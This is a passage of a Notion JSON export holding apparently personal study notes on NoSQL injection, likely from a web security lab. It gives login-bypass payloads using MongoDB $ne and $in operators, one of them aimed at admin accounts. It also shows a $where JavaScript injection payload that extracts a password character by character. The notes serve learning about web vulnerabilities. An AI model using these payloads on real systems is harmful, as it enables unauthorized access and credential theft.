\"not equal to.\"","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" means \"not equal to.\"","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c4-ac99-faf789e6ed1a","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This asks: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This asks: ","href":null},{"type":"text","text":{"content":"find any user whose username is not \"invalid\" AND password = peter.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"find any user whose username is not \"invalid\" AND password = peter.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-802c-9a8c-d74f89b48054","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If the backend ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If the backend ","href":null},{"type":"text","text":{"content":"accepts","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"accepts","href":null},{"type":"text","text":{"content":" this operator, it shows the input isn’t just treated as a string — it’s being interpreted as part of the query.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" this operator, it shows the input isn’t just treated as a string — it’s being interpreted as part of the query.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8065-a4a1-e51196b7ed78","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8052-8a81-fa44d3dd13f8","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Step 2. Test both fields together","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 2. Test both fields together","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80af-86f4-caa4f43a65f1","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If both fields process operators, you can do:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If both fields process operators, you can do:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8041-b606-f46aae8d2c22","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\": {\"$ne\": \"invalid\"}, \"password\": {\"$ne\": \"invalid\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\": {\"$ne\": \"invalid\"}, \"password\": {\"$ne\": \"invalid\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ac-8e57-c1195c58c5c0","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"This means: ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This means: ","href":null},{"type":"text","text":{"content":"find any user whose username is NOT invalid AND password is NOT invalid.","link":null},"annotations":{"bold":false,"italic":true,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"find any user whose username is NOT invalid AND password is NOT invalid.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80c3-ac01-d096fa5712ce","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"That almost always matches at least one user — usually the first account in the database.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"That almost always matches at least one user — usually the first account in the database.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-801b-bb6a-d88308fc2950","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Result:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Result:","href":null},{"type":"text","text":{"content":" You log in without knowing a real username or password.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" You log in without knowing a real username or password.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8058-950b-e6a95e2ba023","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-8054-b2cb-cfd0fdbc50a5","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Step 3. Target a specific account","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Step 3. Target a specific account","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e1-9200-c7aed062a5f2","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If you want to log in as a known admin (or guess possible usernames):","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If you want to log in as a known admin (or guess possible usernames):","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-802e-a470-f1035c35c182","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"username\": {\"$in\": [\"admin\", \"administrator\", \"superadmin\"]}, \"password\": {\"$ne\": \"\"}}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"username\": {\"$in\": [\"admin\", \"administrator\", \"superadmin\"]}, \"password\": {\"$ne\": \"\"}}","href":null}],"language":"json"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e5-a7b9-e90867755229","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"$$in","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"$$in","href":null},{"type":"text","text":{"content":" means \"username is one of these values.\"","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" means \"username is one of these values.\"","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80da-82db-ec21ecd7832b","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"$$ne: \"\"","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"$$ne: \"\"","href":null},{"type":"text","text":{"content":" means password can be anything except empty string — basically no password restriction.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" means password can be anything except empty string — basically no password restriction.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8066-aeb9-d8867279a865","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Result:","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Result:","href":null},{"type":"text","text":{"content":" If one of these usernames exists, you log in as that user.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" If one of these usernames exists, you log in as that user.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-808f-b7e9-f5d8a579b597","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"250dc9c5-3059-80a9-8d78-f0bcd6b016f0","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:51:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Why this works","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Why this works","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-8008-84b7-cb8e0494ee54","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"The backend builds a MongoDB query directly from user input.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"The backend builds a MongoDB query directly from user input.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80ca-af0d-caf0cf2cd638","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"Instead of sending plain text (like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Instead of sending plain text (like ","href":null},{"type":"text","text":{"content":"\"wiener\"","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"\"wiener\"","href":null},{"type":"text","text":{"content":"), you send a JSON object with a query operator.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"), you send a JSON object with a query operator.","href":null}],"color":"default"},"archived":false},{"object":"block","id":"250dc9c5-3059-80e0-9ae1-c8b01c3790fb","parent":{"type":"block_id","block_id":"250dc9c5-3059-80f6-a16c-c9912ff26213"},"created_time":"2025-08-15T18:50:00.000Z","last_edited_time":"2025-08-15T18:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"bulleted_list_item","bulleted_list_item":{"rich_text":[{"type":"text","text":{"content":"If not properly sanitized, MongoDB executes it as part of the query logic.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If not properly sanitized, MongoDB executes it as part of the query logic.","href":null}],"color":"default"},"archived":false}]}]},{"object":"block","id":"251dc9c5-3059-80d5-933a-d326bf6a924e","parent":{"type":"page_id","page_id":"24fdc9c5-3059-8063-ae3e-c3b8fd82eacc"},"created_time":"2025-08-16T10:41:00.000Z","last_edited_time":"2025-08-16T10:53:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Exploiting syntax injection to extract data","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Exploiting syntax injection to extract data","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-805b-a11c-fbf9ccccadb3","parent":{"type":"block_id","block_id":"251dc9c5-3059-80d5-933a-d326bf6a924e"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Some NoSQL databases (like MongoDB) can run limited JavaScript code using special operators such as ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Some NoSQL databases (like MongoDB) can run limited JavaScript code using special operators such as ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":" or functions like ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":" or functions like ","href":null},{"type":"text","text":{"content":"mapReduce()","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"mapReduce()","href":null},{"type":"text","text":{"content":".","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":".","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-807a-a950-c55aafd33815","parent":{"type":"block_id","block_id":"251dc9c5-3059-80d5-933a-d326bf6a924e"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"If an application uses these operators unsafely, attackers can inject JavaScript code that the database will execute. This allows sensitive data to be extracted.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"If an application uses these operators unsafely, attackers can inject JavaScript code that the database will execute. This allows sensitive data to be extracted.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8072-ad52-d6e3e17bb060","parent":{"type":"block_id","block_id":"251dc9c5-3059-80d5-933a-d326bf6a924e"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:43:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"divider","divider":{},"archived":false},{"object":"block","id":"251dc9c5-3059-80ba-8523-c4e3e76160d9","parent":{"type":"block_id","block_id":"251dc9c5-3059-80d5-933a-d326bf6a924e"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:52:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":true,"in_trash":false,"type":"toggle","toggle":{"rich_text":[{"type":"text","text":{"content":"Exfiltrating data in MongoDB","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Exfiltrating data in MongoDB","href":null}],"color":"default"},"archived":false,"children":[{"object":"block","id":"251dc9c5-3059-8019-99d5-c30c83f726a2","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Imagine a vulnerable web app where you can look up a username and see its role:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Imagine a vulnerable web app where you can look up a username and see its role:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8066-b5c2-f3cff26ef796","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"https://insecure-website.com/user/lookup?username=admin","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"https://insecure-website.com/user/lookup?username=admin","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80b3-bbdd-ce49ebcca97e","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"This triggers a query like:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"This triggers a query like:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8039-9167-dc57ba0b3ce4","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\":\"this.username == 'admin'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\":\"this.username == 'admin'\"}","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-80ec-819f-de1df32d49d8","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Since the query uses ","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Since the query uses ","href":null},{"type":"text","text":{"content":"$$where","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":true,"color":"default"},"plain_text":"$$where","href":null},{"type":"text","text":{"content":", you can inject JavaScript to make it return extra information.","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":", you can inject JavaScript to make it return extra information.","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8080-a51a-d10d034b9e5c","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:50:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Case 1: Extract password one character at a time","link":null},"annotations":{"bold":true,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Case 1: Extract password one character at a time","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-80c5-8407-cdd819436d38","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Payload:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Payload:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8091-aa62-d931ca9bea86","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:43:00.000Z","last_edited_time":"2025-08-16T10:45:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"admin' && this.password[0] == 'a' || 'a'=='b","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"admin' && this.password[0] == 'a' || 'a'=='b","href":null}],"language":"plain text"},"archived":false},{"object":"block","id":"251dc9c5-3059-8007-a9dc-e510229c0798","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:48:00.000Z","last_edited_time":"2025-08-16T10:48:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"paragraph","paragraph":{"rich_text":[{"type":"text","text":{"content":"Full query becomes:","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"Full query becomes:","href":null}],"icon":null,"color":"default"},"archived":false},{"object":"block","id":"251dc9c5-3059-8069-9dbd-c15a1a52f3ce","parent":{"type":"block_id","block_id":"251dc9c5-3059-80ba-8523-c4e3e76160d9"},"created_time":"2025-08-16T10:48:00.000Z","last_edited_time":"2025-08-16T10:48:00.000Z","created_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"last_edited_by":{"object":"user","id":"4c79aa7e-a0ef-4194-b620-c86d82580555"},"has_children":false,"in_trash":false,"type":"code","code":{"caption":[],"rich_text":[{"type":"text","text":{"content":"{\"$where\": \"this.username == 'admin' && this.password[0] == 'a' || 'a'=='b'\"}","link":null},"annotations":{"bold":false,"italic":false,"strikethrough":false,"underline":false,"code":false,"color":"default"},"plain_text":"{\"$where\": \"this.username == 'admin' && this.password[0] == 'a' || 